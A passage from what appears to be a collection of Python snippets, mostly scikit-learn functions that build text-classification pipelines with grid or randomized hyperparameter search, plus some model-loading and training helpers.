'starting_verb': 1},\n {'text_pipeline': 0.8, 'starting_verb': 1},\n )\n }\n\n\n # Final model ready to be applied on dataset\n model = GridSearchCV(pipeline, param_grid=parameters)\n \n return model", "def build_model(self):\n pipeline = Pipeline([\n ('vec', CountVectorizer(tokenizer=self.tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier()))\n ])\n self.model = pipeline\n return pipeline", "def model_fn(model_dir):\n model_path = Path(model_dir)/\"model.joblib\"\n clf = joblib.load(model_path)\n return clf", "def create_model(X, y, clf_info, permute):\n import numpy as np\n from sklearn.pipeline import Pipeline\n\n def to_instance(clf_info):\n mod = __import__(clf_info[0], fromlist=[clf_info[1]])\n params = {}\n if len(clf_info) > 2:\n params = clf_info[2]\n clf = getattr(mod, clf_info[1])(**params)\n if len(clf_info) == 4:\n from sklearn.model_selection import GridSearchCV\n\n clf = GridSearchCV(clf, param_grid=clf_info[3])\n return clf\n\n if isinstance(clf_info[0], list):\n # Process as a pipeline constructor\n steps = []\n for val in clf_info:\n step = to_instance(val)\n steps.append((val[1], step))\n pipe = Pipeline(steps)\n else:\n clf = to_instance(clf_info)\n from sklearn.preprocessing import StandardScaler\n\n pipe = Pipeline([(\"std\", StandardScaler()), (clf_info[1], clf)])\n\n y = y.ravel()\n if permute:\n pipe.fit(X, y[np.random.permutation(range(len(y)))])\n else:\n pipe.fit(X, y)\n predicted = pipe.predict(X)\n return (y, predicted), pipe", "def build_model():\n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier()))\n ])\n \n parameters = {'clf__estimator__n_estimators': [50, 100],\n 'clf__estimator__min_samples_split': [2, 3, 5],\n 'clf__estimator__criterion': ['entropy', 'gini']\n }\n \n cv = GridSearchCV(pipeline, param_grid=parameters)\n \n return cv", "def build_model():\n # build pipeline with count vecotrizer, tfidf and support vector machine\n pipeline_SVC = Pipeline([\n ('vect', CountVectorizer(tokenizer = tokenize)),\n ('tfidf', TfidfTransformer()),\n ('multi-clf', MultiOutputClassifier(LinearSVC()))\n ])\n\n # define parameters for gridsearch\n parameters_SVC = {\n 'vect__max_df': (.6, 1),\n 'tfidf__norm': ('l1', 'l2'),\n 'multi-clf__estimator__C': (.1, 1, 100)\n }\n\n # build parameter grid and fit data\n model = GridSearchCV(pipeline_SVC, parameters_SVC)\n\n return model", "def build_model():\n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer = tokenize, min_df = 5)),\n ('tfidf', TfidfTransformer(use_idf = True)),\n ('clf', MultiOutputClassifier(RandomForestClassifier(n_estimators = 10,\n min_samples_split = 10)))\n ])\n\n # Create parameters dictionary\n parameters = {'vect__min_df': [1, 5],\n 'tfidf__use_idf':[True, False],\n 'clf__estimator__n_estimators':[10, 25],\n 'clf__estimator__min_samples_split':[2, 5, 10]}\n\n # create grid search\n cv = GridSearchCV(pipeline, param_grid=parameters)\n\n return cv", "def build_model(search = False):\n\n logging.info(\"run build_model\")\n\n # pipeline definition\n pipeline = Pipeline([\n ('tokenize', TokenizeTransform()), # split text into lemmatized words\n ('tfidf_emb', TfidfEmbeddingVectorizer()),\n ('clf', MultiOutputClassifier(GradientBoostingClassifier()))\n ], verbose=True)\n\n # set pipeline parameters\n pipeline.set_params(**{\n 'tfidf_emb__size':300,\n 'tfidf_emb__iter':200,\n 'tfidf_emb__min_count': 3,\n\n 'clf__estimator__max_depth': 10,\n 
'clf__estimator__n_estimators':50,\n 'clf__estimator__min_samples_split':4,\n 'clf__estimator__random_state':0,\n 'clf__estimator__random_state': 0,\n })\n\n if search == True:\n parameters = {\n 'tfidf_emb__size': (200, 300),\n 'tfidf_emb__iter': (100, 200),\n 'tfidf_emb__min_count': (3, 5),\n\n 'clf__estimator__max_depth': (10,13),\n 'clf__estimator__n_estimators': (20, 30),\n 'clf__estimator__min_samples_split': (2,4),\n }\n\n pipeline = GridSearchCV(pipeline, parameters)\n\n return pipeline", "def build_model():\n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(LogisticRegression(random_state=2020), n_jobs=-1))\n ])\n\n parameters = {\n 'clf__estimator__C': [1, 2, 4],\n 'clf__estimator__penalty': ['l1', 'l2']\n }\n\n cv = GridSearchCV(pipeline, param_grid=parameters, cv=5)\n\n return cv", "def build(X, y=None):\n model = Pipeline([\n ('preprocessor',NLTKPreprocessor()),\n ('vectorizer', CountVectorizer()),\n ('tfidf', TfidfTransformer()),\n ('clf', OneVsRestClassifier(LinearSVC(C=0.9)))])\n\n model.fit(X, y)\n return model", "def build_model():\n # Pipeline of CountVextorizer, TfdifTransformer and MultiOutputClassifier\n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier()))\n ])\n \n parameters = {'clf__estimator__n_estimators': [50, 30],\n 'clf__estimator__min_samples_split': [3, 2] \n }\n \n cv = GridSearchCV(pipeline, param_grid= parameters, verbose=2, n_jobs=4)\n return cv", "def build_model():\n \n #english trained optimized pipeline for word embedding\n nlp = spacy.load(\"en_core_web_md\") # this model will give you 300D\n \n pipeline = Pipeline([\n ('features', FeatureUnion([\n ('text_pipeline', Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ])),\n \n ('embeddings_pipeline', Pipeline([\n ('vect_trans',SpacyVectorTransformer(nlp)),\n ('reduce_dim', TruncatedSVD(50)),\n ])),\n \n ])),\n \n ('clf', MultiOutputClassifier(RandomForestClassifier()))\n ])\n \n parameters = {\n 'features__text_pipeline__vect__max_df': (0.5, 0.75, 1.0),\n 'features__embeddings_pipeline__reduce_dim__n_components':(50,60,70,100,120,130,150)\n }\n cv = GridSearchCV(pipeline, param_grid=parameters,cv=2)\n \n return cv", "def build_model():\n\n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(DecisionTreeClassifier()))\n ])\n\n \n parameters = {'clf__estimator__min_samples_split':[2, 4, 6],\n 'clf__estimator__max_depth': [2, 4]}\n\n #parameters = {'clf__estimator__min_samples_split':[2]}\n cv = GridSearchCV(pipeline, parameters)\n\n return(cv)", "def train_model(\r\n train_x: pd.DataFrame,\r\n train_y: pd.DataFrame,\r\n parameters: Dict[str, Any]\r\n) -> sklearn_Pipeline:\r\n # Build a multi-class logistic regression model\r\n model_params = parameters['model_params']\r\n model = LogisticRegression(**model_params)\r\n\r\n if parameters['model_standard_scaler']:\r\n # Prepare column transformer to do scaling\r\n col_transformer = ColumnTransformer(\r\n [\r\n (\r\n 'standard_scaler',\r\n StandardScaler(copy=False),\r\n [\r\n \"sepal_length\",\r\n \"sepal_width\",\r\n \"petal_length\",\r\n \"petal_width\",\r\n ],\r\n ),\r\n ],\r\n remainder='drop',\r\n )\r\n\r\n # Make pipeline w/ scaler\r\n model_pipeline = sklearn_Pipeline(\r\n steps=[\r\n ('col_transformer', col_transformer),\r\n 
('model', model),\r\n ]\r\n )\r\n else:\r\n # Make pipeline w/o scaler\r\n model_pipeline = sklearn_Pipeline(\r\n steps=[\r\n ('model', model),\r\n ]\r\n )\r\n\r\n # Fit\r\n model_pipeline.fit(train_x, train_y)\r\n\r\n mlflow.set_experiment('iris-example')\r\n mlflow_sklearn.log_model(sk_model=model_pipeline, artifact_path=\"model\")\r\n mlflow.log_params(model_params)\r\n\r\n # Print out the model pipeline\r\n # See: http://www.xavierdupre.fr/app/mlinsights/helpsphinx/notebooks/visualize_pipeline.html\r\n dot = pipeline2dot(model_pipeline, train_x)\r\n dot_filename = 'pipeline_dot.dot'\r\n with open(dot_filename, 'w', encoding='utf-8') as f:\r\n f.write(dot)\r\n if sys.platform.startswith(\"win\") and \"Graphviz\" not in os.environ[\"PATH\"]:\r\n os.environ['PATH'] = os.environ['PATH'] + r';C:\\Program Files (x86)\\Graphviz2.38\\bin'\r\n cmd = \"dot -G=300 -Tpng {0} -o{0}.png\".format(dot_filename)\r\n run_cmd(cmd, wait=True, fLOG=print)\r\n mlflow.log_artifact('{0}.png'.format(dot_filename), 'model')\r\n\r\n return model_pipeline", "def build_model():\n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(AdaBoostClassifier()))\n ])\n\n parameters = {\n 'vect__stop_words': ['english',None],\n 'tfidf__smooth_idf': [True, False],\n 'tfidf__norm': ['l2','l1'],\n 'clf__estimator__learning_rate': [0.5, 1, 2],\n 'clf__estimator__n_estimators': [20, 60, 100]\n }\n\n clf_grid_model = RandomizedSearchCV(pipeline,\n parameters,\n cv=3,\n refit=True,\n verbose=10,\n n_jobs=-1)\n return clf_grid_model", "def from_dict(cls, dikt) -> 'PipelineDefinition':\n return util.deserialize_model(dikt, cls)", "def build_svm_pipeline():\n svm_pipeline = None\n\n svm_pipeline = Pipeline([\n ('vect', CountVectorizer()),\n ('clf', SGDClassifier()),\n ])\n\n return svm_pipeline", "def load_model(model=\"stroke_prediction.joblib\"):\n\n clf = joblib.load(model)\n return clf", "def build_model(self) -> Pipeline:\r\n clf = RandomForestClassifier(\r\n n_estimators=200,\r\n max_features='auto',\r\n min_samples_leaf=1,\r\n min_samples_split=3,\r\n random_state=42, \r\n n_jobs=-1)\r\n model = MultiOutputClassifier(clf)\r\n \r\n pipeline = Pipeline([\r\n ('features', FeatureUnion(\r\n [('text', Pipeline(\r\n [('text_field_extractor', \r\n basic_utils.TextFieldExtractor('message')), \r\n ('tfidf', \r\n TfidfVectorizer(tokenizer=basic_utils.tokenize, \r\n min_df=.0025, max_df=0.5, ngram_range=(1,2)))\r\n ])),\r\n ('numerics', FeatureUnion(\r\n [('text_len', \r\n Pipeline([('text_len_extractor', \r\n basic_utils.NumericFieldExtractor('text_len')), \r\n ('text_len_scaler', StandardScaler())\r\n ])),\r\n ('punt_perc', \r\n Pipeline([('punt_perc_extractor', \r\n basic_utils.NumericFieldExtractor('punt_perc')), \r\n ('punt_perc_scaler', StandardScaler())\r\n ]))\r\n ])),\r\n ('starting_verb', basic_utils.PosFieldExtractor('starting_verb_flag'))\r\n ])),\r\n ('clf', model)\r\n ])\r\n \r\n return pipeline", "def _predict_preproc_model(self, model_cfg, model,):\n model = self._make_model(model_cfg['model_name'], databunch=self._data)\n model.model_param = model_cfg['model_param']\n model.wrapper_params = model_cfg['wrapper_params']\n return(model)", "def build_model():\n \n pipelineRFC = Pipeline([('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier()))])\n \n param = {\n 'clf__estimator__n_estimators': [10, 50]\n }\n \n gscv = GridSearchCV(pipelineRFC, param_grid=param, 
verbose=15)\n return gscv", "def train_model_pipeline(conform_shape=True, indi_proportion=0.50, incl_group_imgs=True,\r\n feature_extractor=flatten_array, model=train_logistic_regression): \r\n # Create dataframe subject to feature extractor requirements\r\n X_train, y_train, X_test_indi, y_test_indi, X_test_group, y_test_group = \\\r\n create_train_test_sets(conform_shape=conform_shape, indi_proportion=indi_proportion, \r\n incl_group_imgs=incl_group_imgs)\r\n \r\n # Extract features\r\n if feature_extractor == extract_ORB_features:\r\n if os.path.isfile('Trained_Models/Kmeans_model.sav'):\r\n kmeans_model = load_model('Trained_Models/Kmeans_model.sav')\r\n else:\r\n kmeans_model = kmeans_cluster(X_train, 500)\r\n X_train = feature_extractor(X_train, kmeans_model, normalize = False)\r\n X_test_indi = feature_extractor(X_test_indi, kmeans_model, normalize = False)\r\n X_test_group = feature_extractor(X_test_group, kmeans_model, normalize = False)\r\n\r\n else:\r\n X_train = feature_extractor(X_train)\r\n X_test_indi = feature_extractor(X_test_indi)\r\n X_test_group = feature_extractor(X_test_group)\r\n \r\n # Train model on flattened array (no feature extraction)\r\n trained_model = model(X_train, y_train)\r\n \r\n indi_pred_class, indi_accuracy = evaluate_model(trained_model, X_test_indi, y_test_indi)\r\n group_pred_class, group_accuracy = evaluate_model(trained_model, X_test_group, y_test_group)\r\n \r\n return trained_model, indi_pred_class, indi_accuracy, group_pred_class, group_accuracy", "def _get_pipeline(self, params_dict):\n p = Pipeline(steps=[('normalise', StandardScaler()),\n ('add_noise', NoiseAdder()),\n ('dim_reduce', PCA()),\n ('cluster', KMeans())])\n p.set_params(**params_dict)\n return p", "def model_fn(model_dir):\n\n model = BertForSequenceClassification.from_pretrained('cl-tohoku/bert-base-japanese-whole-word-masking', \n num_labels=1)\n model = torch.nn.DataParallel(model)\n with open(os.path.join(model_dir, 'model.pth'), 'rb') as f:\n model.load_state_dict(torch.load(f))\n \n return {\"net\": model, \"tokenizer\": tokenizer}", "def build_model():\n \n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier()))\n ])\n \n parameters = {\n 'vect__ngram_range': ((1, 1), (1, 2)),\n 'clf__estimator__min_samples_split': [2, 4],\n }\n \n cv = GridSearchCV(pipeline, param_grid=parameters)\n\n return cv", "def load_model(input_path):\n logger.info(\"Loading model from %s\" % input_path)\n return pyspark.ml.PipelineModel.load(input_path)", "def predict(\r\n model: sklearn_Pipeline, \r\n test_x: pd.DataFrame\r\n) -> pd.DataFrame:\r\n # Return predictions\r\n return model.predict(test_x)", "def build_own_pipeline() -> Pipeline:\n clf = svm.LinearSVC(C=2, loss='hinge')\n vect = TfidfVectorizer(ngram_range=(1, 2))\n\n pipeline = None\n ##### Write code here #######\n pipeline = Pipeline([\n ('vect', vect),\n ('tfidf', TfidfTransformer()),\n ('clf', clf)\n ])\n ##### End of your work ######\n return pipeline", "def model_pipeline_run(index, model, params, X_train, y_train, X_test, y_test, model_name, pre_process_time, type):\n n_jobs = -1\n n_iter = 100\n if model is None:\n return\n try:\n row = {\"dataset_index\": index}\n if type == \"classification\":\n steps = [(\"classifier\", model)]\n else:\n steps = [(\"regressor\", model)]\n pipeline = MLPipeline(steps=steps)\n if type == \"classification\":\n if model_name == \"rf\":\n params[\"classifier__max_features\"] = [min([x, 
X_train.shape[1]]) for x in\n params[\"classifier__max_features\"]]\n elif \"dl\" in model_name:\n n_jobs = None\n params[\"classifier__shape\"] = [X_train.shape[1]]\n if isinstance(y_test[0], (str)):\n try:\n y_train = np.asarray(list(map(lambda x: int(re.search(\"[0-9]+\", x).group()), y_train)))\n y_test = np.asarray(list(map(lambda x: int(re.search(\"[0-9]+\", x).group()), y_test)))\n except Exception as e:\n le = LabelEncoder()\n y_train = le.fit_transform(y_train)\n y_test = le.transform(y_test)\n grid = RandomizedSearchCV(estimator=pipeline, param_distributions=params, cv=KFold(3), refit=True,\n verbose=0, n_jobs=n_jobs, n_iter=n_iter,\n scoring=\"f1\" if len(set(y_train)) == 2 else \"f1_weighted\")\n else:\n if model_name == \"rf\":\n params[\"regressor__max_features\"] = [min([x, X_train.shape[1]]) for x in\n params[\"regressor__max_features\"]]\n elif \"dl\" in model_name:\n n_jobs = None\n params[\"regressor__shape\"] = [X_train.shape[1]]\n grid = RandomizedSearchCV(estimator=pipeline, param_distributions=params, cv=KFold(3), refit=True,\n verbose=0, n_jobs=n_jobs, n_iter=n_iter, error_score=np.nan)\n model_time = time.time()\n columns = X_train.columns\n if \"dl-rnn\" in model_name:\n X_train = np.reshape(X_train.astype(\"float32\").values, (X_train.shape[0], 1, X_train.shape[1]))\n X_test = np.reshape(X_test.astype(\"float32\").values, (X_test.shape[0], 1, X_test.shape[1]))\n else:\n X_train = X_train.astype(\"float32\").values\n X_test = X_test.astype(\"float32\").values\n grid = grid.fit(X_train.astype(\"float32\"), y_train)\n row[\"time\"] = (time.time() - model_time) / 60\n row[\"pre_process_time\"] = pre_process_time\n return scoring(grid, X_train, X_test, y_train, y_test, columns, row=row, model_name=model_name, type=type)\n except Exception as e:\n print(e)", "def create(pdef):\n from sklearn.pipeline import Pipeline\n return [Pipeline(p) for p in pdef]", "def train_model(X, y, model_type, ngram_type, label_type):\n assert(label_type in ['oh', 'ed'])\n assert(model_type in ['linear', 'mlp'])\n assert(ngram_type in ['word', 'char'])\n\n # tensorflow models aren't fork safe, which means they can't be served via uwsgi\n # as work around, we can serve a pure sklearn model\n # we should be able to find another fix\n\n if label_type == 'oh' and model_type == 'linear':\n\n y = np.argmax(y, axis = 1)\n\n clf = Pipeline([\n ('vect', CountVectorizer()),\n ('tfidf', TfidfTransformer()),\n ('clf', LogisticRegression()),\n ])\n\n params = {\n 'vect__max_features': 10000,\n 'vect__ngram_range': (1,2),\n 'vect__analyzer' : ngram_type,\n 'tfidf__sublinear_tf' : True,\n 'tfidf__norm' :'l2',\n 'clf__C' : 10,\n }\n else:\n if label_type == 'oh':\n y = one_hot(y)\n print(np.unique(y))\n\n clf = Pipeline([\n ('vect', CountVectorizer()),\n ('tfidf', TfidfTransformer()),\n ('to_dense', DenseTransformer()),\n ('clf', KerasClassifier(build_fn=make_mlp, output_dim = y.shape[1], verbose=False)),\n ])\n cv_results = pd.read_csv('cv_results.csv')\n query = \"model_type == '%s' and ngram_type == '%s' and label_type == '%s'\" % (model_type, ngram_type, label_type)\n params = cv_results.query(query)['best_params'].iloc[0]\n params = json.loads(params)\n print(\"parameters\", params)\n return clf.set_params(**params).fit(X,y)", "def load_pipeline():\n\n try:\n logging.info(\"Loading the fitted pipeline...\")\n with open(base.SAVED_MODEL_PATH, \"rb\") as model_file:\n pipeline = pickle.load(model_file)\n logging.info(\"Loading completed successfully...\")\n except FileNotFoundError:\n 
logging.error(\"Model file has not been found.\")\n raise\n return pipeline", "def get_sklearn_model(x):\n if is_sklearn_model(x):\n return x # already a valid model\n elif type(x) is dict:\n if hasattr(x, 'model'):\n return get_sklearn_model(x['model'])\n else:\n return None\n elif type(x) is str:\n # noinspection PyBroadException\n try:\n return get_sklearn_model(eval(x))\n except:\n pass\n return None", "def fit_transform(self, load_script=False):\n\n # Interpret the request data based on the expected row and column structure\n row_template = ['strData', 'strData']\n col_headers = ['model_name', 'n_features']\n feature_col_num = 1\n \n # An additional key field column is expected if the call is made through the load script\n if load_script:\n row_template = ['strData', 'strData', 'strData']\n col_headers = ['model_name', 'key', 'n_features']\n feature_col_num = 2\n \n # Create a Pandas Data Frame for the request data\n self.request_df = utils.request_df(self.request, row_template, col_headers)\n \n # Initialize the persistent model\n self.model = PersistentModel()\n \n # Get the model name from the request dataframe\n self.model.name = self.request_df.loc[0, 'model_name']\n \n # Get the model from cache or disk\n self._get_model()\n \n # Debug information is printed to the terminal and logs if the paramater debug = true\n if self.model.debug:\n self._print_log(3)\n \n # Check that the estimator is an unsupervised ML algorithm\n if self.model.estimator_type not in [\"decomposer\", \"clusterer\"]:\n err = \"Incorrect usage. The estimator specified is not a known decompostion or clustering algorithm: {0}\".format(self.model.estimator)\n raise Exception(err)\n\n if load_script:\n # Set the key column as the index\n self.request_df.set_index(\"key\", drop=False, inplace=True)\n\n # Split the features provided as a string into individual columns\n self.X = pd.DataFrame([x[feature_col_num].split(\"|\") for x in self.request_df.values.tolist()], columns=self.model.features_df.loc[:,\"name\"].tolist(),\\\n index=self.request_df.index)\n \n # Convert the data types based on feature definitions \n self.X = utils.convert_types(self.X, self.model.features_df)\n\n # Construct the preprocessor\n prep = Preprocessor(self.model.features_df, scale_hashed=self.model.scale_hashed, scale_vectors=self.model.scale_vectors,\\\n missing=self.model.missing, scaler=self.model.scaler, logfile=self.logfile, **self.model.scaler_kwargs)\n \n # Create a chache for the pipeline's transformers\n # https://scikit-learn.org/stable/modules/compose.html#caching-transformers-avoid-repeated-computation\n # cachedir = mkdtemp()\n\n # Construct a sklearn pipeline\n self.model.pipe = Pipeline([('preprocessor', prep)]) #, memory=cachedir)\n\n if self.model.dim_reduction:\n # Construct the dimensionality reduction object\n reduction = self.decomposers[self.model.reduction](**self.model.dim_reduction_args)\n \n # Include dimensionality reduction in the sklearn pipeline\n self.model.pipe.steps.insert(1, ('reduction', reduction))\n self.model.estimation_step = 2\n else:\n self.model.estimation_step = 1 \n\n # Construct an estimator\n estimator = self.algorithms[self.model.estimator](**self.model.estimator_kwargs)\n\n # Add the estimator to the sklearn pipeline\n self.model.pipe.steps.append(('estimator', estimator)) \n\n # Fit the data to the pipeline\n if self.model.estimator_type == \"decomposer\":\n # If the estimator is a decomposer we apply the fit_transform method at the end of the pipeline\n self.y = 
self.model.pipe.fit_transform(self.X)\n\n # Prepare the response\n self.response = pd.DataFrame(self.y, index=self.X.index)\n\n elif self.model.estimator_type == \"clusterer\":\n # If the estimator is a decomposer we apply the fit_predict method at the end of the pipeline\n self.y = self.model.pipe.fit_predict(self.X)\n\n # Prepare the response\n self.response = pd.DataFrame(self.y, columns=[\"result\"], index=self.X.index)\n \n # Clear the cache directory setup for the pipeline's transformers\n # rmtree(cachedir)\n \n # Update the cache to keep this model in memory\n self._update_cache()\n \n if load_script:\n # Add the key field column to the response\n self.response = self.request_df.join(self.response).drop(['n_features'], axis=1)\n \n # If the function was called through the load script we return a Data Frame\n if self.model.estimator_type == \"decomposer\":\n self._send_table_description(\"reduce\")\n elif self.model.estimator_type == \"clusterer\":\n self._send_table_description(\"cluster\")\n \n # Debug information is printed to the terminal and logs if the paramater debug = true\n if self.model.debug:\n self._print_log(4)\n \n return self.response\n \n # If the function was called through a chart expression we return a Series\n else:\n # Dimensionality reduction is only possible through the load script\n if self.model.estimator_type == \"decomposer\":\n err = \"Dimensionality reduction is only possible through the load script.\"\n raise Exception(err)\n \n # Debug information is printed to the terminal and logs if the paramater debug = true\n if self.model.debug:\n self._print_log(4)\n \n return self.response.loc[:,'result']", "def buildModel( self, transformer, classifier ):\n summitAIModel = make_pipeline ( transformer , classifier )\n summitAIModel.fit ( self.X , self.y )\n joblib.dump ( summitAIModel , self.modeldump )", "def __build_ml_pipeline(self, clf: MultiOutputClassifier) -> Pipeline:\r\n pipeline = Pipeline([\r\n ('features', FeatureUnion(\r\n [('text', Pipeline(\r\n [('text_field_extractor', \r\n basic_utils.TextFieldExtractor('message')), \r\n #('vect', CountVectorizer(tokenizer=clean_text)),\r\n #('tfidf', TfidfTransformer())\r\n ('tfidf', TfidfVectorizer(tokenizer=basic_utils.tokenize, \r\n min_df=.0025, max_df=0.25, \r\n ngram_range=(1,2)))\r\n ])),\r\n \r\n ('numerics', FeatureUnion(\r\n [('text_len', \r\n Pipeline([('text_len_extractor', \r\n basic_utils.NumericFieldExtractor('text_len')), \r\n ('text_len_scaler', StandardScaler())\r\n ])),\r\n ('punt_perc', \r\n Pipeline([('punt_perc_extractor', \r\n basic_utils.NumericFieldExtractor('punt_perc')), \r\n ('punt_perc_scaler', StandardScaler())\r\n ]))\r\n ])),\r\n ('starting_verb', basic_utils.PosFieldExtractor('starting_verb_flag'))\r\n ])),\r\n \r\n ('clf', clf)\r\n ])\r\n \r\n return pipeline", "def get_pipeline(features, to_matrix=True):\n feature_names = []\n for feature in features:\n feature_names += feature[1].FEATS\n if to_matrix:\n return Pipeline(features + [('transform', ToMatrix(features=feature_names)), ('norm', MinMaxScaler())])\n else:\n return Pipeline(features)", "def pipeline():\n\n test_pipeline = (Pipeline()\n .init_variable('current_loss')\n .init_model('model', C('model_class'),\n 'dynamic', C('model_config'))\n .to_array(dtype='float32')\n .train_model('model',\n inputs=B('images'),\n targets=B('labels'),\n outputs='loss',\n save_to=V('current_loss'))\n )\n return test_pipeline", "def get_pipelines(emo_best_model_dict, taskname, anal):\r\n parent_dir = Path.cwd().parent\r\n task_name = 
'class_' #default\r\n analysis = 'model_anal_' # default\r\n\r\n if taskname == 'r':\r\n task_name = 'reg_'\r\n if anal != 'model':\r\n analysis = anal + '_anal_'\r\n\r\n prev_name = task_name + analysis\r\n emo_pipeline_dict = {}\r\n for emotion, best_model_prop in emo_best_model_dict.items(): # dataset, classifier, vectorizer, k\r\n #Change k = 0 for all_in features\r\n if best_model_prop[0] == 'all_in':\r\n best_model_prop[0] = str(0)\r\n pipeline_path = parent_dir.joinpath('default_results', 'pipelines_' + emotion, prev_name + emotion + '_' + best_model_prop[0] + '_' + best_model_prop[1]\r\n + '_' + best_model_prop[2] + '_' + best_model_prop[3] + '.pkl')\r\n print(pipeline_path)\r\n if os.path.exists(pipeline_path):\r\n pipeline = pd.read_pickle(pipeline_path)\r\n emo_pipeline_dict[emotion] = pipeline\r\n else:\r\n # If the file doesnt exist, exit the program with instructions\r\n print('\\nRequired files does not exist.\\nPlease, train the models and select the best model for the prediction task by running model_selection > Modelling.py')\r\n sys.exit(1)\r\n print(emo_pipeline_dict)\r\n return emo_pipeline_dict", "def get_model(\n model: PipelineModel,\n use_auth_token: Union[Text, None] = None,\n) -> Model:\n\n if isinstance(model, Model):\n pass\n\n elif isinstance(model, Text):\n model = Model.from_pretrained(\n model, use_auth_token=use_auth_token, strict=False\n )\n\n elif isinstance(model, Mapping):\n model.setdefault(\"use_auth_token\", use_auth_token)\n model = Model.from_pretrained(**model)\n\n else:\n raise TypeError(\n f\"Unsupported type ({type(model)}) for loading model: \"\n f\"expected `str` or `dict`.\"\n )\n\n model.eval()\n return model", "def buildModel (self , transformer, classifier ):\n for module in ('acct' , 'arch', 'bo', 'fo', 'risk'):\n summitAIModel = make_pipeline ( transformer , classifier )\n summitAIModel.fit ( self.X[self.ModuleData[module]], self.y[self.ModuleData[module]] )\n joblib.dump ( summitAIModel, self.modelDumps[module] )", "def buildModel (self , transformer, classifier ):\n for module in ('acct' , 'arch', 'bo', 'fo', 'risk'):\n summitAIModel = make_pipeline ( transformer , classifier )\n summitAIModel.fit ( self.X[self.ModuleData[module]], self.y[self.ModuleData[module]] )\n joblib.dump ( summitAIModel, self.modelDumps[module] )", "def _parse_model(model: str, num_classes: int) -> Callable[[], tf.keras.Model]:\n if model == 'cnn':\n keras_model_builder = functools.partial(\n create_conv_dropout_model, num_classes=num_classes)\n elif model in ['resnet18', 'resnet34', 'resnet50', 'resnet101', 'resnet152']:\n keras_model_builder = functools.partial(\n getattr(resnet_models, f'create_{model}'),\n input_shape=(28, 28, 1),\n num_classes=num_classes)\n else:\n raise ValueError(\n 'Cannot handle model flag [{!s}], must be one of {!s}.'.format(\n model, _EMNIST_MODELS))\n return keras_model_builder", "def build(model_name):\n return pretrain.factory.create(model_name)", "def get_linear_model():\n\n ss = StandardScaler()\n lr = LogisticRegression(penalty='l2', max_iter=1000, class_weight=None) # ridge\n\n lr_model = Pipeline(steps=(['scale', ss], ['clf', lr])) # pipeline\n\n lr_model_params = {\n 'clf__C':loguniform(1e-3,1e3)\n }\n\n # model: classifier with randomised parameter search over nested 3-fold CV\n linear_model = RandomizedSearchCV(lr_model, lr_model_params, n_iter=100, cv=3)\n\n return clone(linear_model)", "def build_own_pipeline() -> Pipeline:\n nn_pipeline = None\n\n nn_pipeline = Pipeline([\n ('vect', CountVectorizer()),\n ('tfidf', 
TfidfTransformer()),\n ('clf', MLPClassifier()) \n ])\n \n return nn_pipeline", "def _build(self,\n model_type: str,\n **kwargs) -> Predictor:\n if model_type == 'classifier':\n modelcls = sklearn.gaussian_process.GaussianProcessClassifier\n elif model_type == 'regressor':\n modelcls = sklearn.gaussian_process.GaussianProcessRegressor\n else:\n raise ValueError(\n '`model_type` should be \"classifier\" or \"regressor\"')\n model = modelcls(**kwargs)\n return model", "def get_linear_model(params):\n\n ss = StandardScaler()\n lr = ElasticNet(selection='random', random_state=42) # EN\n\n if params['pca']:\n pca = PCA(n_components=params['pca_comps'], whiten=True)\n lr_model = Pipeline(steps=(['scale', ss], ['pca', pca], ['model', lr])) # pipeline\n else:\n lr_model = Pipeline(steps=(['scale', ss], ['model', lr])) # pipeline\n\n lr_model_params = {\n 'model__alpha': loguniform(1e-1, 1e3),\n 'model__l1_ratio': uniform(0.1, .9)\n }\n\n # model: classifier with randomised parameter search over nested 3-fold CV\n linear_model = RandomizedSearchCV(lr_model, lr_model_params, n_iter=500, cv=5)\n\n return clone(linear_model)", "def build_model(): \n \n \n pipeline = Pipeline([('vect', CountVectorizer(tokenizer=tokenize)),('tfidf', TfidfTransformer()),\n ('MLC', MultiOutputClassifier(KNeighborsClassifier()))])\n \n parameters = {'MLC__estimator__n_neighbors': [3,5],'MLC__estimator__leaf_size':[10,20,30] }\n custom_recall = make_scorer(recall_score,average='weighted')\n\n cv = GridSearchCV(pipeline, param_grid = parameters, n_jobs = -1, verbose=2)\n\n\n return cv", "def import_sklearn_models(module):\n models = [d for d in dir(module) if hasattr(getattr(module, d), 'fit_transform')]\n for m in models:\n exec(f'from {module.__name__} import {m}', globals())\n return models", "def to_regressor(model_fn: Callable, kwargs) -> KerasRegressor:\n return KerasRegressor(model_fn, **kwargs)", "def load_model(model):\n generator = tf.keras.models.load_model(model, custom_objects=custom_objects)\n return generator", "def predict_model():\n data = request.json\n\n if data:\n predictor.pred_dict[\"model\"] = data[\"model\"]\n else:\n pass\n\n return 'Non tam praeclarum est scire latine, quam turpe nescire'", "def to_sklearn(self):\n import sklearn.pipeline as skp\n\n steps = []\n for step in self.steps:\n steps += [(step[0], step[1].to_sklearn())]\n return skp.Pipeline(steps)", "def _scaling_model_from_dict(obj):\n for entry_point in pkg_resources.iter_entry_points(\"dxtbx.scaling_model_ext\"):\n if entry_point.name == obj[\"__id__\"]:\n return entry_point.load().from_dict(obj)", "def model_fn(model_dir):\n \n sym, arg_params, aux_params = mx.model.load_checkpoint('%s/102flowers' % model_dir, 0)\n mod = mx.mod.Module(symbol=sym, context=mx.cpu(), label_names=None)\n mod.bind(for_training=False, 